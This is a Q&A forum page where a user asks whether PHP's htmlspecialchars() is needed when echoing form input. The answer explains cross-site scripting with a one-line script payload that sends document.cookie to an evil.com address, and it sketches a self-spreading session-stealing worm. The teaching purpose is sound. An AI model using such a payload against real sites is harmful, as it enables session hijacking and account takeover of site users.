I was looking at the php.net manual and it had this line of code:

Question

0

Asked: May 31, 20262026-05-31T23:24:10+00:00 2026-05-31T23:24:10+00:00

I was looking at the php.net manual and it had this line of code:

0

I was looking at the php.net manual and it had this line of code:

Hi <?php echo htmlspecialchars($_POST['name']); ?>.
You are <?php echo (int)$_POST['age']; ?> years old.

It says underneath:

htmlspecialchars() makes sure any characters that are special in html are properly encoded so people can’t inject HTML tags or Javascript into your page.

Is this really necessary?

Can someone actually put in malious code into that one line? What is there to worry about? Can something be injected into that line to run some php code? Are they just getting people accustomed to watching for this even though there is no threat in this case?

Report

Leave an answer
Cancel reply

You must login to add an answer.

Need An Account,

1 Answer

Editorial Team · Answer 1 · 2026-05-31T23:24:11+00:00

Editorial Team

2026-05-31T23:24:11+00:00Added an answer on May 31, 2026 at 11:24 pm

If someone’s name happened to be:

<script>document.write('<img src="http://www.evil.com/worm.php?'+document.cookie+'"/>');</script>

Then a worm could be unleashed on your site. In essence the worm is just a script that takes the users session cookie, logs in, and then does malicious stuff, replicating itself as more people view it.

0

Reply
Share
Share

- Report

Sign Up

Sign In

Forgot Password

The Archive Base Latest Questions

I was looking at the php.net manual and it had this line of code:

Leave an answerCancel reply

1 Answer

Leave an answer
Cancel reply